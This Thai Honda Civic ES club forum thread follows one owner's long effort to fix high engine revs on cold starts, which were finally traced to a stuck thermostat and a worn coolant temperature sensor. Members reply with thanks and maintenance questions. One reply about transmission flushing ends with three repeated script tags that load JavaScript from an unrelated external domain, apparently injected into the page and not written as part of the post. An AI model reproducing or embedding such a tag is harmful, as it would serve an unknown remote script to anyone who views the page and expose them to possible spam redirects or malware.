ตอบ
Ton-


เข้าร่วม: 02 ตุลา 2008
ตอบ: 1397

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5467
ให้คำขอบคุณ: 1471
จันทร์, 8 พฤศจิกา 2010 09:26 - แก้ปัญหา รอบสูงเวลาเครื่องเย็น อย่าทำเรื่องเล็กให้เป็นเรื่องใหญ่ (เหมือนผม)
เนื่องจากปีนี้ผมโดนค่าซ่อมเยอะรถไปเยอะมากเกือบ 5 หมื่น เลยอยากเอาประสบการณ์มาเล่าสู่กันฟังหน่อยครับ เริ่มเลยนะครับมหากาพย์การซ่อมรถของผม

รถปี 02 vtec นะครับ เป็นรถที่ซื้อต่อเค้ามาอีกที อาการที่เป็นมาได้ซัก 1 ปีกว่าแล้วคือ เวลาเครื่องเย็นแล้วออกวิ่งไป รอบจะสูงกว่าปกติ ถ้าพูดแค่นี้บางคนก็อาจจะบอกว่าปกติ แต่ของผมอ่ะวิ่งไปได้ 20 โล หรือ 20 นาที รอบยังสูงกว่าปกติอยู่เลยครับ โดยรอบจะสูงในทุกๆ เกียร์ กว่าปกติประมาณ 300 รอบ เช่น

ที่ความเร็ว 60 ปกติ 1500 รถผมเกือบ 1800
ที่ความเร็ว 70 ปกติ 1800 รถผม 2100
ที่ 80 ปกติ 2100 รถผม 2400
ที่ 90 ปกติ 2300 รถผม 2600
ที่ 100 ปกติ 2500 รถผม 2800
ที่ 110 ปกติ 2800 รถผม 3000
ที่ 120 ปกติ 3000 รถผม 3300

และจะเป็นทุกเช้าหรือทุกครั้งที่จอดจนเครื่องเย็น พอขับไปได้ซัก 20 นาที ก็จะหาย รอบเด้งกลับลงมาปกติ (รู้สึกได้ เหมือนมีแรงผลักเบาๆ) ลักษณะการขับรถของผมคือออกจากบ้านก็ขึ้นทางด่วนเลย วิ่งฉิวจนถึงที่ทำงาน แต่ถ้าเมื่อไรวิ่งออกมาแล้วรถติด อาการจะน้อยกว่ามาก

กับอาการที่เป็นมานี้ผมก็ไม่ได้สนใจอะไรมากมายคิดว่าเป็นเรื่องปกติมั่ง รีเซ็ท ecu ก็ไม่หาย บางทีก็คิดว่าเป็นที่เกียร์ ก็กะว่าจะรอให้เกียร์พังแล้วซ่อมทีเดียว จากวันที่เริ่มสังเกตุผ่านมาประมาณ 1 ปีกว่า คือประมาณกลางปีนี้ เกียร์ผมก็พังจนได้ ไมล์ 160,000 โอเค สมเหตุสมผล ก็เอารถเข้าอู่ เปลี่ยนคลัตเปลี่ยนกรองอะไรไปตามสเตป เอารถออกมา ปรากฏว่า......อาการนี้ไม่หายครับ เซ็งสุดขีด อู่ที่ผมเอาเข้าไปซ่อมก็บอกปกติหนิ ผมก็ขี้เกียจอธิบาย แถมทำรถตรูเป็นรอย ท่อก็ย่นอีก แม่ม เอารถออกเลย แล้วไปเข้าอีกอู่ อู่ที่สองก็ดีเหลือเกิน เค้าบอกว่าอืมผิดปกติ แถมเจออีกอาการคือรถไม่มีแรง โดยการทำ stall test (ใส่เกียร์ D เหยียบเบรกแล้วเร่งเครื่อง ปกติต้องได้ 2500 รอบ รถผมที่เพิ่งซ่อมเกียร์มาดันได้แค่ 3000 รอบ) เอารถผมไปซ่อม 1 เดือน ยกเกียร์ขึ้นลงอยู่หลายรอบจนเสร็จ สรุปว่าเปลี่ยน torque converter ไป อาการรถไม่มีแรงหายเลยครับ คราวนี้เทสได้ 2400 รอบ ecu ลองสับกับคันอื่นแล้วปกติ แต่ปรากฏ .......อาการรอบสูงไม่หาย คิดในใจไอ้ห่าเอ๊ย ขายแม่มเลยดีมั้ย น่ารำคาญมาก แต่พี่เจ้าของอู่บอกว่า เอาเข้ามาจะพยายามแก้ให้ คราวนี้จะเปลี่ยนเกียร์ให้เลย (คิดอีกรอบ กูต้องเสียตังอีกเท่าไร ถ้าไม่หาย มีชักดาบแน่ ฮา) ผ่านไปอีก 1 อาทิตย์ เปลี่ยนเกียร์ลูกใหม่ ปรากฏว่า ....ไม่หายครับ.... อารมณ์นั้นเกินจะบรรยาย พี่แกบอกเอารถไปใช้ก่อน รอบสองยังไม่ต้องจ่าย อ่าก็ยังดีฟร่ะ คราวนี้พอผมเอารถกลับมาใช้ ก็มานั่งวิเคราะห์ สังเกตหาสาเหตุเอง ก็มาเจอว่า ความร้อนทำไมมันขึ้นช้าจังหว่า วิ่งไป 10 กว่านาทีแล้ว ยังไม่ถึงจุดเลย บางทีขับไปเกือบ 15 โล ความร้อนยังแค่เกือบถึงจุดปกติ (ต้องสังเกต ทำสัญลักษณ์เอาไว้)

มานั่งคิดๆ ดู ต้องมีอะไรผิดปกติเกี่ยวกับสัญญาณที่ส่งไปที่ ecu สั่งให้รถมันชดเชยรอบให้แน่เลย เหมือนกับเครื่องมันยังเย็นอยู่มันเลยชดเชยรอบอยู่นั่นแหละ
คิดได้ดังนั้นเลยเอารถเข้า 0 แม่มเลย บอกอาการช่างทั้งหมด บอกว่าเพิ่งเปลี่ยนเกียร์มา ไม่น่าจะเป็นเพราะเกียร์ เอารถเข้าไปได้ครึ่งวันช่างโทรมารถพี่ได้ซ่อมเกียร์มานานรึยัง (คิดในใจ ไอ้เวรเอ๊ยก็บอกว่าเพิ่งซ่อมมา อาการนี้ก็เป็นตั้งแต่ก่อนซ่อมแล้ว) ผมก็เน้นว่าให้ดูที่ระบบหล่อเย็น เซ็นเซอร์วัดอุณหภูมิให้หน่อย โอเคจบ

อีกวันไปรับรถ ช่างบอกหายแล้วครับ โคตรดีใจเลย เอาโดยสรุปเลยละกัน
1. วาล์วน้ำหล่อเย็นค้าง โดยปกติสตาร์ทรถเมื่อเครื่องเย็น วาล์วจะยังไม่เปิด หรือเปิดน้อยๆ เพื่อให้เครื่องมันร้อนถึงจุดเหมาะสมก่อน แต่ของผมมันค้างทำให้มันหล่อเย็นตลอดเวลา เครื่องเลยไม่ร้อนซักที ยิ่งผมวิ่งขึ้นทางด่วนตั้งแต่ออกจากบ้าน ลมโกรกตลอด ยิ่งทำให้มันร้อนช้ามากขึ้นไปอีก รอบเลยมีการชดเชยเสมือนรถยังวอร์มอัพอยู่ตลอดเวลา
2. ECT sensor เสื่อม ตัวนี้เป็นตัวส่งสัญญาณไปที่ ECU เพื่อให้ลิ้นผีเสื้อเปิดปิดตามค่าที่ตั้งไว้ แต่ตัวนี้ของหมด เลยยังไม่ได้เปลี่ยน

ผมเปลี่ยนอื่นๆ อีกมากมาย สรุปโดนไปเป็นหมื่น
เมื่อนำรถออกมาใช้ สิ่งที่เปลี่ยนแปลงไปอย่างชัดเจนเลยคือ

1. สตาร์ทรถตอนเครื่องเย็น รอบเดินเบาอยู่ที่ 1100 ก่อนจะตกลงมาที่ 900 เมื่อเครื่องร้อน ตอนยังเสียอยู่สตาร์ทรถไม่ว่าตอนไหนก็อยู่ที่ 900 (รอบนี้มีการเปลี่ยนประเก็นตรงลิ้นปีกด้วย ไม่รู้เกี่ยวรึเปล่า)
2. วิ่งไปได้แค่ 3 นาที ความร้อนก็มาอยู่ที่จุดปกติแล้วครับ ของเดิมซัดไป 15-20 นาที รอบทุกอย่างขึ้นตามปกติ สรุปว่าหายแล้ว ฮา....น้ำตาไหล หลังจากเกือบสองปีที่เป็นมา

ปล ECT sensor ผมยังไม่ได้เปลี่ยนแต่ก็ยังไม่เห็นอาการอะไร ว่างๆ คงเข้าไปเปลี่ยน
ปล 2 ใครรู้สึกเหมือนผมบ้างว่าเวลาเข้า 0 แล้วมันเหมือนคนที่รู้ว่าจะโดนฟัน แต่บางทีก็ไม่มีทางเลือก บวกกับรับประกันงาน 6 เดือน อะไหล่ 12 เดือน ถึงค่าแรงจะแพงกว่าหลายเท่า แต่ได้งานเร็ว ไม่ถูกดอง มีเครื่องมือครบๆ รถไม่โดนตากแดด ตากฝน มาคิดๆ ดูมันก็คุ้มเหมือนกัน (พยายามคิดหาเหตุผลเข้าข้างตัวเอง เพราะทุกครั้งที่เอาเข้าอู่นอก พอไปดูรถทีไร สงสารรถเลย นึกว่ามันเอารถตูไปออกรบมาเหรอวะ ฝุ่นหนาเป็นมิล โคตรโทรม)
สุดท้าย อาการของผมทั้งหมด ถ้าไม่สังเกตก็แทบจะไม่รู้สึกเลยนะครับ และผมก็เชื่อว่ามันเป็นสาเหตุนึงที่ทำให้ เกียร์ไปไวกว่าเดิมเพราะ มันเท่ากับวิ่งโดยที่น้ำมันเกียร์ยังไม่ถึงอุณหภูมิที่มันจะมีประสิทธิภาพในการหล่อลื่นและถ่ายเทความร้อนได้เต็มที่ ความสึกหรอก็จะมากขึ้นไปด้วย
หวังว่ามันจะเป็นประโยชน์กับเพื่อนๆ คนอื่นที่มีอาการคล้ายๆของผม

ปล 3 ขอไม่บอกชื่ออู่นะครับ เพราะเค้าก็พยายามอย่างที่สุดแล้ว แม้แต่ที่ 0 เอง ถ้าผมไม่บอกเค้าให้เช็คระบบหล่อเย็นผมก็เชื่อว่าผมมีสิทธิ์ได้ซ่อมเกียร์รอบที่ 3 ที่ศูนย์อย่างแน่นอน 5555

เพื่อนคนไหนยังไม่เคยสังเกตตรงจุดนี้ ก็สังเกตกันได้เลยนะครับ ช่วยยืดอายุของเกียร์ได้แน่นอน


ราคา นี่แค่ค่าของนะครับ ยังไม่รวม vat กับค่าแรง เฮือกๆๆๆๆ
ราคา นี่แค่ค่าของนะครับ ยังไม่รวม vat กับค่าแรง เฮือกๆๆๆๆ
รูปวาล์วน้ำ กับ สวิทช์ความร้อน
รูปวาล์วน้ำ กับ สวิทช์ความร้อน
วาล์วน้ำ จะอยู่ในตัวกระปุกนี้หล่ะครับ
วาล์วน้ำ จะอยู่ในตัวกระปุกนี้หล่ะครับ
3 ตัวสำคัญ 1. valve น้ำ (สายไฟบังอยู่) 2. สวิทช์ควบคุมความร้อน (ผมว่าไม่เสีย แต่ 0 ก็เปลี่ยนให้ตามอายุ) 3. ECT 0 ว่าเสื่อมแต่ยังไม่ได้เปลี่ยน
3 ตัวสำคัญ 1. valve น้ำ (สายไฟบังอยู่) 2. สวิทช์ควบคุมความร้อน (ผมว่าไม่เสีย แต่ 0 ก็เปลี่ยนให้ตามอายุ) 3. ECT 0 ว่าเสื่อมแต่ยังไม่ได้เปลี่ยน


แก้ไขล่าสุดโดย เมื่อ จันทร์, 8 พฤศจิกา 2010 09:30, ทั้งหมด 2 ครั้ง (ดูทั้งหมด)
Ton-


เข้าร่วม: 02 ตุลา 2008
ตอบ: 1397

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5467
ให้คำขอบคุณ: 1471
จันทร์, 8 พฤศจิกา 2010 09:27 - แก้ปัญหา รอบสูงเวลาเครื่องเย็น อย่าทำเรื่องเล็กให้เป็นเรื่องใหญ่ (เหมือนผม)
แถม ดูหม้อน้ำกันมั่งนะครับ


เขียวเชียวตามตะเข็บ
เขียวเชียวตามตะเข็บ
วิธีดูให้ส่องที่ช่องฝาหม้อน้ำ ถ้าตะเข็บเริ่มขึ้นเขียวๆ แล้วก็เตรียมเปลี่ยนได้เลย ตัวนี้ซื้อกับคนในคลับถูกกว่า แล้วเอามาเปลี่ยนข้างนอกจะถูกกว่าครับ (ที่เห็นในรูปเป็นตัวใหม่แล้ว)
วิธีดูให้ส่องที่ช่องฝาหม้อน้ำ ถ้าตะเข็บเริ่มขึ้นเขียวๆ แล้วก็เตรียมเปลี่ยนได้เลย ตัวนี้ซื้อกับคนในคลับถูกกว่า แล้วเอามาเปลี่ยนข้างนอกจะถูกกว่าครับ (ที่เห็นในรูปเป็นตัวใหม่แล้ว)
MK Flying


ชื่อเล่น: ยุทธ

เข้าร่วม: 04 กุมภา 2010
ตอบ: 379

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 686
ให้คำขอบคุณ: 135

ที่อยู่: แม่กลอง-ชุมพร
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 8 พฤศจิกา 2010 09:49 - แก้ปัญหา รอบสูงเวลาเครื่องเย็น อย่าทำเรื่องเล็กให้เป็นเรื่องใหญ่ (เหมือนผม)
ขอบคุณมากๆเลยครับ
ได้รับคำขอบคุณจาก: karnmotocross01 
battery3k


เข้าร่วม: 09 ธันวา 2008
ตอบ: 1247

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1251
ให้คำขอบคุณ: 3414

ที่อยู่: onnuch-srinakarin-bangkok
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 8 พฤศจิกา 2010 11:15 - แก้ปัญหา รอบสูงเวลาเครื่องเย็น อย่าทำเรื่องเล็กให้เป็นเรื่องใหญ่ (เหมือนผม)
เข้าใจความรู้สึกเลยครับ
ผมเคยมีปัญหาที่แก้ไขไม่ได้ ไม่จบซักที
สุดท้ายก็เลยต้องกลับเข้าศูนย์ จบครับ
ต้องดูเป็น เคส เคสไป ครับ
บางเรื่องทำข้างนอกได้ก็ำทำข้างนอก
บางเรื่อง ร้ายแรง หาสาเหตุไม่เจอ
ก็ต้องเข้าศูนย์
ดีใจด้วยครับ ที่หาสาเหตุึเจอ
ได้รับคำขอบคุณจาก: karnmotocross01 
wut-chiangmai


ชื่อเล่น: วุฒิ

เข้าร่วม: 28 มีนา 2009
ตอบ: 2094

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3937
ให้คำขอบคุณ: 5037

ที่อยู่: เชียงใหม่
ปี: 2004
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 8 พฤศจิกา 2010 11:36 - แก้ปัญหา รอบสูงเวลาเครื่องเย็น อย่าทำเรื่องเล็กให้เป็นเรื่องใหญ่ (เหมือนผม)
ดีใจด้วยนะครับ ที่ได้รถ ES คู่ใจกลับมาขับ อย่างปกติ อยู่กันไปอีกนาน

ขอบคุณมาก ๆ สำหรับข้อมูลที่นำมาแบ่งปันกันนะครับ
ได้รับคำขอบคุณจาก: karnmotocross01 
Oad


ชื่อเล่น: โอ๊ต

เข้าร่วม: 18 พฤศจิกา 2009
ตอบ: 83

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 183
ให้คำขอบคุณ: 213

ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 8 พฤศจิกา 2010 12:17 - แก้ปัญหา รอบสูงเวลาเครื่องเย็น อย่าทำเรื่องเล็กให้เป็นเรื่องใหญ่ (เหมือนผม)
อ่านมาจนถึงเกจวัดความร้อนผมร้อง เอ่อใช่เลยคับ
ในความคิดผมไม่มีช่างคนไหนรู้จักรถเราดีเท่าตัวเราเอง
ต้องหมั่นสังเกตุ และพยายามวิเคราะห์ปัญหาด้วยตัวเองก่อน
จะช่วยได้มากเลย เหมือนในกรณีคุณtonเลยคับ

ขอบคุณมากครับสำหรับการแชร์ความรู้
ได้รับคำขอบคุณจาก: karnmotocross01  Trairat HATC 
fasang.Mr


ชื่อเล่น: บี

เข้าร่วม: 23 มีนา 2010
ตอบ: 2101

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1764
ให้คำขอบคุณ: 2323

ที่อยู่: นนทบุรี-ประจวบฯ-พะเยา
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 8 พฤศจิกา 2010 12:35 - แก้ปัญหา รอบสูงเวลาเครื่องเย็น อย่าทำเรื่องเล็กให้เป็นเรื่องใหญ่ (เหมือนผม)
เก็บข้อมูลครับ
ได้รับคำขอบคุณจาก: karnmotocross01 
curran


ชื่อเล่น: บี

เข้าร่วม: 07 กันยา 2009
ตอบ: 4300

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2057
ให้คำขอบคุณ: 5484

ที่อยู่: Samutprakarn
ปี: 2001
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 8 พฤศจิกา 2010 12:41 - แก้ปัญหา รอบสูงเวลาเครื่องเย็น อย่าทำเรื่องเล็กให้เป็นเรื่องใหญ่ (เหมือนผม)
ขอบคุณสำหรับข้อมูลดีๆครับ

เชื่อว่า เพื่อนๆ หลายๆ คนคงได้ประโยชน์ไม่มากก็น้อยครับ
ได้รับคำขอบคุณจาก: karnmotocross01 
pongkung


ชื่อเล่น: ปอง

เข้าร่วม: 12 กันยา 2009
ตอบ: 185

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 231
ให้คำขอบคุณ: 180

ที่อยู่: สำโรง
ปี: 2003
สี: แดง แรลไล (R-513)
จันทร์, 8 พฤศจิกา 2010 12:48 - แก้ปัญหา รอบสูงเวลาเครื่องเย็น อย่าทำเรื่องเล็กให้เป็นเรื่องใหญ่ (เหมือนผม)
แก้มาเกือบ 2 ปี ดีใจด้วย
ได้รับคำขอบคุณจาก: karnmotocross01 
battery3k


เข้าร่วม: 09 ธันวา 2008
ตอบ: 1247

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1251
ให้คำขอบคุณ: 3414

ที่อยู่: onnuch-srinakarin-bangkok
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 8 พฤศจิกา 2010 13:09 - แก้ปัญหา รอบสูงเวลาเครื่องเย็น อย่าทำเรื่องเล็กให้เป็นเรื่องใหญ่ (เหมือนผม)
ถามเพิ่มหน่อยสิครับ
บังเอิญเห็นในใบรายการการซ่อมว่า
มีแจ้งเรื่อง มีเสียงตอนสตาร์ทรถดังแชด แป็บเดียว
สรุึปว่าเพราะอะไรอะครับ เผอิญเป็นอยู่
เกือบทุกเช้าเลยครับ
ได้รับคำขอบคุณจาก: karnmotocross01 
apple2


ชื่อเล่น: นพ

เข้าร่วม: 05 พฤศจิกา 2009
ตอบ: 496

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 675
ให้คำขอบคุณ: 471

ที่อยู่: นครปฐม
ปี: 2002
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 8 พฤศจิกา 2010 13:11 - แก้ปัญหา รอบสูงเวลาเครื่องเย็น อย่าทำเรื่องเล็กให้เป็นเรื่องใหญ่ (เหมือนผม)
ได้รับคำขอบคุณจาก: karnmotocross01 
Ton-


เข้าร่วม: 02 ตุลา 2008
ตอบ: 1397

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5467
ให้คำขอบคุณ: 1471
จันทร์, 8 พฤศจิกา 2010 13:32 - แก้ปัญหา รอบสูงเวลาเครื่องเย็น อย่าทำเรื่องเล็กให้เป็นเรื่องใหญ่ (เหมือนผม)
battery3k พิมพ์ว่า:
ถามเพิ่มหน่อยสิครับ
บังเอิญเห็นในใบรายการการซ่อมว่า
มีแจ้งเรื่อง มีเสียงตอนสตาร์ทรถดังแชด แป็บเดียว
สรุึปว่าเพราะอะไรอะครับ เผอิญเป็นอยู่
เกือบทุกเช้าเลยครับ


ช่างไม่แน่ใจครับ แต่เห็นบอกว่าเช็คมอเตอร์สตาร์ทเริ่มเสื่อมแล้ว ผมยังไม่ได้เปลี่ยนเหมือนกันเพราะราคา 4 พันกว่า ของผมเป็นอาทิตย์ละ 1 ครั้งโดยเฉลี่ย ส่วนตัวแล้วก็ไม่แน่ใจว่าใช่ตัวนี้รึเปล่า เพราะเมื่อไรที่สตาร์ทแล้วได้ยินเสียงนี้ เวลาขับออกไป วิ่งๆ อยู่ที่ 80 บางทีก็ได้ยินเสียงคล้ายๆ กันอีก ผมเลยยังไม่เปลี่ยนครับ
ได้รับคำขอบคุณจาก: battery3k  sayarm  karnmotocross01 
zan


เข้าร่วม: 23 สิงหา 2009
ตอบ: 3145

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3432
ให้คำขอบคุณ: 6687

ที่อยู่: HNC
จันทร์, 8 พฤศจิกา 2010 13:35 - แก้ปัญหา รอบสูงเวลาเครื่องเย็น อย่าทำเรื่องเล็กให้เป็นเรื่องใหญ่ (เหมือนผม)
แก้ปัญหา รอบสูงเวลาเครื่องเย็น อย่าทำเรื่องเล็กให้เป็นเรื่องใหญ่ (เหมือนผม)


แก้ไขล่าสุดโดย เมื่อ พุธ, 4 มีนา 2015 08:19, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: karnmotocross01 
bactro


เข้าร่วม: 25 ธันวา 2008
ตอบ: 5

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 2
ให้คำขอบคุณ: 6

ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
จันทร์, 8 พฤศจิกา 2010 13:36 - แก้ปัญหา รอบสูงเวลาเครื่องเย็น อย่าทำเรื่องเล็กให้เป็นเรื่องใหญ่ (เหมือนผม)
Oad พิมพ์ว่า:
อ่านมาจนถึงเกจวัดความร้อนผมร้อง เอ่อใช่เลยคับ
ในความคิดผมไม่มีช่างคนไหนรู้จักรถเราดีเท่าตัวเราเอง
ต้องหมั่นสังเกตุ และพยายามวิเคราะห์ปัญหาด้วยตัวเองก่อน
จะช่วยได้มากเลย เหมือนในกรณีคุณtonเลยคับ

ขอบคุณมากครับสำหรับการแชร์ความรู้


คิดเหมือนกัน
ได้รับคำขอบคุณจาก: karnmotocross01 
SIRATH BUALUANG


ชื่อเล่น: กรด

เข้าร่วม: 08 ธันวา 2009
ตอบ: 740

Guru ES
Guru ES

ได้รับคำขอบคุณ: 701
ให้คำขอบคุณ: 577

ที่อยู่: 3 จังหวัดชายแดนใต้
ปี: 2001
สี: แดง ไฟร์เปปเปอร์ (R-507P)
จันทร์, 8 พฤศจิกา 2010 14:19 - แก้ปัญหา รอบสูงเวลาเครื่องเย็น อย่าทำเรื่องเล็กให้เป็นเรื่องใหญ่ (เหมือนผม)
เฮ้อ..อ...

สงสารเจ้าของรถน่ะ...

กว่าจะจบ...

ขอให้มีความสุขกับการขับขี่ es นะครับ...

ได้รับคำขอบคุณจาก: karnmotocross01 
nopkub


ชื่อเล่น: นพ

เข้าร่วม: 03 กันยา 2010
ตอบ: 338

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 474
ให้คำขอบคุณ: 179

ที่อยู่: พระประแดง สมุทรปราการ
ปี: 2003
จันทร์, 8 พฤศจิกา 2010 14:55 - แก้ปัญหา รอบสูงเวลาเครื่องเย็น อย่าทำเรื่องเล็กให้เป็นเรื่องใหญ่ (เหมือนผม)
ขอบคุณครับที่แชร์ประสบการณ์
ได้รับคำขอบคุณจาก: karnmotocross01 
the


ชื่อเล่น: ธี

เข้าร่วม: 30 กันยา 2010
ตอบ: 405

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 276
ให้คำขอบคุณ: 153

ที่อยู่: รัชดา
ปี: 2002
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
จันทร์, 8 พฤศจิกา 2010 15:07 - แก้ปัญหา รอบสูงเวลาเครื่องเย็น อย่าทำเรื่องเล็กให้เป็นเรื่องใหญ่ (เหมือนผม)
ขอบคุณข้อมูลดีดีนี้มากคับ ละเอียดด้วย
รถผมก็เครื่องร้อนช้าเหมือนกันคับ
แต่ส่วนใหญ่แล้ว ตอนเช้าก่อนออกรถทุกครั้งผมอุ่นเครื่องก้อประมาณ10-12นาทีคับ
คิดว่าน่าจะปกตินะคับ
ปี02 มือ4 เครื่อง+เกียปกติเลยซื้อคับ
ได้รับคำขอบคุณจาก: karnmotocross01 
alit


ชื่อเล่น: เอ

เข้าร่วม: 25 กันยา 2009
ตอบ: 659

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1446
ให้คำขอบคุณ: 1266

ที่อยู่: สุขุมวิท BTS อ่อนนุช
ปี: 2002
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 8 พฤศจิกา 2010 15:27 - แก้ปัญหา รอบสูงเวลาเครื่องเย็น อย่าทำเรื่องเล็กให้เป็นเรื่องใหญ่ (เหมือนผม)
Oad พิมพ์ว่า:
อ่านมาจนถึงเกจวัดความร้อนผมร้อง เอ่อใช่เลยคับ
ในความคิดผมไม่มีช่างคนไหนรู้จักรถเราดีเท่าตัวเราเอง
ต้องหมั่นสังเกตุ และพยายามวิเคราะห์ปัญหาด้วยตัวเองก่อน
จะช่วยได้มากเลย เหมือนในกรณีคุณtonเลยคับ

ขอบคุณมากครับสำหรับการแชร์ความรู้


ใช่ครับเวลาขับ ผมจะดูที่หน้าปัดทุกๆ 5 นาทีถ้าเป็นไปได้ ต้องหมั่นสังเกต เสียงเครื่อง เสียงช่วงล่าง เสียงอื่นๆที่แปลกปลอมจากที่เราไม่เคยได้ยินตอนขับ อาการสั่นหรือการสะเทือนเวลาลงหลุมหรือขึ้นเนิน อย่าดีแต่ขับครับ และต้องพยายามบอกอาการเบื้องต้นให้ช่างทราบได้หรืออย่างผมถ้าสามารถวิเคราะห์ได้ก็จะคุยกับช่างด้วยว่าใช่จากสาเหตุนี่โน่นหรือเปล่าครับ
ได้รับคำขอบคุณจาก: sayarm  karnmotocross01  Trairat HATC 
sayarm


ชื่อเล่น: หยาม

เข้าร่วม: 03 ตุลา 2008
ตอบ: 2229

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2543
ให้คำขอบคุณ: 4055

ที่อยู่: ระยอง (แต่คนพะเยา ^_^ )
ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 8 พฤศจิกา 2010 15:48 - แก้ปัญหา รอบสูงเวลาเครื่องเย็น อย่าทำเรื่องเล็กให้เป็นเรื่องใหญ่ (เหมือนผม)
ขอบคุณข้อมูลดีๆครับ
ได้รับคำขอบคุณจาก: karnmotocross01 
thebump


เข้าร่วม: 22 ตุลา 2008
ตอบ: 381

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 472
ให้คำขอบคุณ: 670

ที่อยู่: ประชาอุทิศ ทุ่งครุ กทม
ปี: 2005
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 8 พฤศจิกา 2010 16:46 - แก้ปัญหา รอบสูงเวลาเครื่องเย็น อย่าทำเรื่องเล็กให้เป็นเรื่องใหญ่ (เหมือนผม)
ขอบคุณเจ้าของกระทู้ครับ..สำหรับข้อมูลดีๆมีประโยชน์
แต่ว่าแต่ว่าเกียร์นี่พังเร็วเหมือนกันนะครับ...อิอิ (แซวเล่น)
แสน หก กว่าๆก็ไปซะแล้ว ยังไงแนะนำให้เพื่อนๆดูแลรักษาเกียร์กันหน่อยนะครับ..จาได้อยู่กะเรานานๆ
ปล.ของผมจา เข้า 2 แสน อยู่นิดๆแล้ว จะไปเมื่อไหร่ก็ยังไม่รู้ แต่แนะนำว่าให้ล้างระบบเกียร์ซะหน่อยก็ดีนะครับ..สำหรับท่านใดที่ไม่
เคยล้างมาก่อน ประมาณว่า เข้าหลัก 1 แสนโลเป็นต้นไป เสียแค่หลักพันแต่ช่วยเรื่องกรองเกียร์ตันได้เยอะเลย....
"<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: karnmotocross01  popza4 
dodcivices


ชื่อเล่น: โดด

เข้าร่วม: 30 กันยา 2009
ตอบ: 537

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 861
ให้คำขอบคุณ: 539

ที่อยู่: สมุทรปราการ
ปี: 2004
สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 8 พฤศจิกา 2010 17:22 - แก้ปัญหา รอบสูงเวลาเครื่องเย็น อย่าทำเรื่องเล็กให้เป็นเรื่องใหญ่ (เหมือนผม)
ขอบคุณครับ
ได้รับคำขอบคุณจาก: karnmotocross01 
kamonchai


ชื่อเล่น: โอ

เข้าร่วม: 26 กุมภา 2009
ตอบ: 88

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 127
ให้คำขอบคุณ: 4

ที่อยู่: 164/200 ศรีเทพไทย
ปี: 2003
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
จันทร์, 8 พฤศจิกา 2010 21:42 - แก้ปัญหา รอบสูงเวลาเครื่องเย็น อย่าทำเรื่องเล็กให้เป็นเรื่องใหญ่ (เหมือนผม)
ถามเพิ่มหน่อยครับ เช็ค หะฟสส ะำหะ ที่ว่าเต้าเช็คอย่างไรบ้างครับ
คือผม over hall เกียร์ไปตอน 145000 แต่ ครัชไม่หมด คือมีอาการ
วิ่งลากรอบไป หรือวิ่งความเร็ว 160 ไปนานๆ พอ ผ่อนคั่นเร่ง ก็มี อาการ แหงวๆๆๆๆ
เร่งไม่ขึ้น จะเป็นตอนวิ่งแล้วถอนคันเร่งเร็วๆ พอเป็นต้องหยุดให้สนิท แล้วค่อยไปต่อ
พอไปหาช่างลองตั้งนานกว่าจะเจอ ก็เลย over hall พอถอดมาเช็ค ครัชไม่หมดเหลือเยอะ
ก็เลย คิดว่าเป็นที่ torque converter หรือ ซีลยางแข็งตัว
ช่างก็เลยลองเปลี่ยน ซีล แผ่นครัชใหม่ ก็หายครับ แต่ จะมีอาการคล้ายๆกัน ตอนวิ่งมาเร็วๆ แล้วเบรคลากยาว
ก็จะมีเสียง แหงวๆๆๆ เหมือนเดิม แต่ไม่เป็นไร ซึ่งผมคิดว่ามันไม่ใช่เสียง เหมือนปกติของเกียร์ auto
ทั่วไปครับ ร่ายสะยาว คือ stall test อย่างไรครับ ที่ดูว่า torque converter พัง
ปล.รบกวน PM ร้านที่ทำให้หน่อยได้ไหมครับ ขอบคุณครับ
ได้รับคำขอบคุณจาก: karnmotocross01  Trairat HATC 
muzalime


